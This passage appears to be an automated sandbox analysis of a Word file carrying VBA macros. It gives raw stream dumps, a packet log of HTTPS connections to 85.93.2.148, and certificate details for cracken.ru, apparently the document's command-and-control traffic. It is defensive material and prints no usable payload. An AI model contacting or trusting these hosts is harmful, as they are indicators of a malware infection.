Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 810

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	810
Entropy:	6.50619704379
Base64 Encoded:	True
Data ASCII:	. & . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . C . [ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . \| . . [ .
Data Raw:	01 26 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 c7 43 d7 5b 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.06127588563
Base64 Encoded:	False
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . b . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 0e 00 00 62 7f 00 00 62 7f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2017 14:01:03.588519096 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:03.588606119 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:03.588782072 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:03.646631002 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:03.646661997 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:04.835303068 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:04.835351944 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:04.835366964 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:04.835552931 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:04.842401981 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:04.842434883 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:04.843794107 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:05.044481039 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:05.044622898 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:05.186239958 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:05.186414957 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:05.186770916 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:05.959671021 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:05.959749937 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:05.959947109 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:05.964972019 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:05.965003967 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:06.452359915 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:06.452394009 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:06.452419043 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:06.452946901 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:06.454158068 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:06.454202890 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:06.455718040 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:06.656451941 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:06.657588959 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:06.894402027 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:06.894623041 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:06.894886017 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:07.414731026 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:07.616456032 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:07.616699934 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:07.626754999 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:07.626971960 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:07.627264023 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:07.627429962 MEZ	49163	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:07.627482891 MEZ	443	49163	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:08.297745943 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:08.500480890 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:08.500701904 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:08.509295940 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:08.509495020 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:08.509718895 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:08.510251045 MEZ	49164	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:08.510296106 MEZ	443	49164	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:53.621213913 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:53.621274948 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:53.621995926 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:53.622769117 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:53.622793913 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:54.146044016 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:54.156970978 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:54.157011986 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:54.170855999 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:54.170917988 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:54.174230099 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:54.174267054 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:54.174623966 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:54.174639940 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:55.789771080 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:55.789818048 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:55.789900064 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:55.790915012 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:55.790942907 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:55.982198954 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.184468031 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.184781075 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.233095884 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.233125925 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.233289003 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.233304024 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.233318090 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.233483076 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.233501911 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.233588934 MEZ	49168	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.233599901 MEZ	443	49168	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.529485941 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.608778954 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.608804941 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.676901102 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.676923990 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.677572966 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.677587032 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:56.677644014 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:56.677656889 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:57.904277086 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:58.112447023 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:58.112648964 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:58.113092899 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:58.113116026 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:58.113235950 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:01:58.113298893 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:58.113390923 MEZ	49169	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:01:58.113424063 MEZ	443	49169	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:06.590076923 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:06.590121984 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:06.590279102 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:06.722912073 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:06.722945929 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:07.483216047 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:07.483261108 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:07.483278990 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:07.483445883 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:07.484750032 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:07.484771967 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:07.485573053 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:07.688450098 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:07.692608118 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:07.939991951 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:07.954993963 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:07.955244064 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:09.439654112 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:09.640497923 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:09.640644073 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:09.641920090 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:09.642052889 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:09.642175913 MEZ	443	49170	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:09.642297983 MEZ	49170	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:10.243783951 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:10.243834019 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:10.244062901 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:10.244610071 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:10.244642019 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:10.888300896 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:10.889394045 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:10.889417887 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:10.907659054 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:10.907700062 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:10.907833099 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:10.907854080 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:12.307487965 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:12.512458086 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:12.512732029 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:12.513827085 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:12.513847113 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:12.514036894 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:12.514098883 MEZ	49171	443	192.168.1.16	85.93.2.148
Nov 9, 2017 14:02:12.514112949 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:12.752481937 MEZ	443	49171	85.93.2.148	192.168.1.16
Nov 9, 2017 14:02:12.752621889 MEZ	49171	443	192.168.1.16	85.93.2.148

HTTP Request Dependency Graph

85.93.2.148

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
Nov 9, 2017 14:01:04.835366964 MEZ	443	49163	85.93.2.148	192.168.1.16	EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Wed Nov 08 14:01:04 CET 2017	Thu Nov 08 14:01:04 CET 2018	[[ Version: V3 Subject: EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 148464715531648983675869436801448005946718863850793557755944285026680453005080864507211203883552953769741043350219011504910557537919669791969903003459896832340294027541878102542750730829212775320315093969922839142241184522778636197919003394994226649241173361768835857807624527555332056917985237383197977380209 public exponent: 3 Validity: [From: Wed Nov 08 14:01:04 CET 2017, To: Thu Nov 08 14:01:04 CET 2018] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ acda3d75 8bf3f455]Certificate Extensions: 5[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 8A 3D C0 D2 EA 50 C4 E3 0A 1A C9 E7 A0 F7 0E 99 .=...P..........0010: 44 00 50 00 D.P.]]] Algorithm: [SHA1withRSA] Signature:0000: 4D 84 94 4F 8E 83 0D 0B E4 17 B0 ED 04 4D 21 1E M..O.........M!.0010: F3 C9 56 10 73 3A 6F 57 F7 45 65 6E 4B 9A 69 C0 ..V.s:oW.EenK.i.0020: 0B F9 FC 2B C1 63 BE F8 71 7F 8C 3C BB 90 97 03 ...+.c..q..<....0030: FF E3 95 29 8D DD D1 E8 03 96 04 A9 E0 A2 31 5B ...)..........1[0040: AD 2D 04 E3 D8 52 CA FD 05 5E 96 C5 CC 76 44 76 .-...R...^...vDv0050: 02 0D 9D A1 E2 A3 8E 92 39 6D 3F A0 09 F5 4B 40 ........9m?...K@0060: 9D 61 4E 26 EB 1E AF 14 5C 29 00 0A 64 CA 0C 22 .aN&....\)..d.."0070: 73 E4 14 BB 7C 74 80 4E B4 BC A9 86 32 8E C2 AC s....t.N....2...0080: B5 E3 F1 83 2D C0 B9 89 4F AD E2 80 41 5E 89 8F ....-...O...A^..0090: 84 CA 2B 63 57 F9 44 96 D5 5C 72 96 BD 93 86 33 ..+cW.D..\r....300A0: 94 B5 95 C4 43 D6 FC 75 55 86 6C F9 FE F9 CF FC ....C..uU.l.....00B0: 55 DE B4 72 F7 4C F4 ED 71 6F 85 E1 00 2C 05 FE U..r.L..qo...,..00C0: C2 FC 25 7F 0A 1A E1 A2 3D 4B 7A 62 A2 F6 94 77 ..%.....=Kzb...w00D0: D8 47 F8 41 1B 3C F3 1A DC C8 8A 02 8C 3A 58 82 .G.A.<.......:X.00E0: 48 B5 BF E2 36 7A DD 19 FD F8 72 E8 ED ED A3 F8 H...6z....r.....00F0: E7 01 32 41 1A F7 8E 62 8A 13 D4 FC CD 20 49 B2 ..2A...b..... I.0100: 0E 6F 35 65 4C 8A C1 D7 59 53 0E E2 C8 A0 D5 FF .o5eL...YS......0110: B9 90 D2 2C 93 6F CB BD 64 70 47 B0 B5 59 49 59 ...,.o..dpG..YIY0120: A2 EE 9F 00 E5 CB 8C EB 0A 01 59 12 93 9A 6E A6 ..........Y...n.0130: 4B 09 40 7C 9B 18 3A CD 62 1F 24 D2 E1 A2 71 80 K.@...:.b.$...q.0140: D9 0C A2 1B 8E CF FD 25 FD 82 B7 1E 66 06 68 EF .......%....f.h.0150: 10 40 C3 EC 75 A0 8B E6 CC 49 F5 60 60 C9 36 1D .@..u....I.``.6.0160: B0 7A 46 87 07 04 D7 DE 4C 03 CD 73 54 E5 19 21 .zF.....L..sT..!0170: 4A BE E8 53 69 D5 24 1C 5F 36 2F CD 68 E5 7D E5 J..Si.$._6/.h...0180: 69 0B 16 47 2D DB 76 DA 7E 7C 7E 16 75 C1 9F 69 i..G-.v.....u..i0190: DC 46 5F 6B AA F1 DA 34 CD 4B 70 E3 82 67 BD 7C .F_k...4.Kp..g..01A0: 27 B0 1F 82 96 23 AE 94 24 0F 94 C8 43 4F 29 EE '....#..$...CO).01B0: 7E 9C 7A D2 F6 65 5D 3F 6C 4A 37 70 8B D6 92 64 ..z..e]?lJ7p...d01C0: 14 07 CA 17 52 14 EE 81 79 9D 7B 37 08 52 7F 58 ....R...y..7.R.X01D0: F4 3D F4 00 FD 8A 8E 20 A7 5B CF F2 2B E7 A8 14 .=..... .[..+...01E0: 15 C7 15 67 84 69 FD C2 72 6E 96 D5 1A 82 9C BB ...g.i..rn......01F0: 04 C9 D9 78 85 42 10 13 F0 55 A0 AA 7C 6B 3B 49 ...x.B...U...k;I]
Nov 9, 2017 14:01:04.835366964 MEZ	443	49163	85.93.2.148	192.168.1.16	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Nov 9, 2017 14:01:06.452419043 MEZ	443	49164	85.93.2.148	192.168.1.16	EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Wed Nov 08 14:01:04 CET 2017	Thu Nov 08 14:01:04 CET 2018	[[ Version: V3 Subject: EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 148464715531648983675869436801448005946718863850793557755944285026680453005080864507211203883552953769741043350219011504910557537919669791969903003459896832340294027541878102542750730829212775320315093969922839142241184522778636197919003394994226649241173361768835857807624527555332056917985237383197977380209 public exponent: 3 Validity: [From: Wed Nov 08 14:01:04 CET 2017, To: Thu Nov 08 14:01:04 CET 2018] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ acda3d75 